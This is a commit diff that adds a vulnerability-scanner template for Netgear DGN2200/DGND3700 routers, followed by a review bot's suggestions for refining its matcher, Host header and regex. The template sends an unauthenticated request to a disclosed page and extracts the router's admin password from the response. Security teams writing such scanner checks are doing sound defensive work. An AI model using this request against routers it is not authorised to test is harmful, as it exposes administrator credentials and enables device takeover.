Netgear Router - Admin Password Disclosure

patch-1
Suman Kar 2021-07-06 19:55:39 +05:30
parent 4b590e43f5
commit 270359703f
1 changed files with 25 additions and 0 deletions

@ -0,0 +1,25 @@
id: netgear-DGN2200-DGND3700-admin-password-disclosure
info:
name: Netgear DGN2200 / DGND3700 - Admin Password Disclosure
author: suman_kar
description: Vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. Attacker can use this password to gain administrator access of the targeted routers web interface.
severity: critical
tags: iot,netgear,router
requests:
- raw:
- |
GET /BSW_cxttongr.htm HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
extractors:
- type: regex
name: password
part: body
regex:
- Success ".*"
matchers:
- type: status
status:
- 200
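
Review bot: The `matchers` block at the end of the template checks only for status 200, so any host that answers `GET /BSW_cxttongr.htm` with a 200 (for example a custom error page served with that status) is reported as a critical finding. Add a body matcher that requires the same `Success "..."` pattern the extractor looks for, and join it to the status check with `matchers-condition: and`. In the raw request there is no `Host` header; adding `Host: {{Hostname}}` after the request line keeps it valid HTTP/1.1. The extractor regex `Success ".*"` is greedy and runs to the last quote on the line, so `Success "[^"]*"` would capture only the quoted value. The description would also read better if it said the page discloses the admin password, since "this password" has no antecedent as written.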